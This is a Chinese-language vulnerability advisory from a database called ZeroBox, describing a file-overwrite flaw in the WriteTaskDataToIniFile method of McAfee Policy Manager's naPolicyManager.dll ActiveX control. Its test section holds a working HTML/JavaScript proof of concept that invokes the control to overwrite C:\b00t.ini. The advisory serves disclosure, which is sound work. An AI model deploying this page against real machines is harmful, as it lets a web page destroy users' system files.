ZeroBox Vulnerability Database

漏洞起因
输入验证错误
 
影响系统
McAfee Policy Manager
 
不受影响系统
 
危害
远程攻击者可以利用漏洞以应用程序权限覆盖系统文件。
 
攻击所需条件
攻击者必须构建恶意WEB页，诱使用户打开。
 
漏洞信息
McAfee ePolicy Orchestrator是一款业界领先的系统安全管理解决方案，能够帮助企业有效抵御各种恶意威胁和攻击。
McAfee Policy Manager ‘naPolicyManager.dll’控件存在设计问题，远程攻击者可以利用漏洞以应用程序权限覆盖系统文件。
问题存在于WriteTaskDataToIniFile方法中，提交恶意文件作为参数，可导致以应用程序权限覆盖系统文件。
 
测试方法
<HTML>
<BODY>
 <object id=ctrl classid="clsid:{04D18721-749F-4140-AEB0-CAC099CA4741}"></object>
<SCRIPT>
function Do_1t()
 {
   File = "C:\b00t.ini"
   ctrl.WriteTaskDataToIniFile(File)
 }
</SCRIPT>
<input language=JavaScript onclick=Do_1t() type=button value="P0c">
</BODY>
</HTML
 
厂商解决方案
目前没有解决方案提供：
http://www.mcafee.com/
 
漏洞提供者
GOODFELLAS Security Research TEAM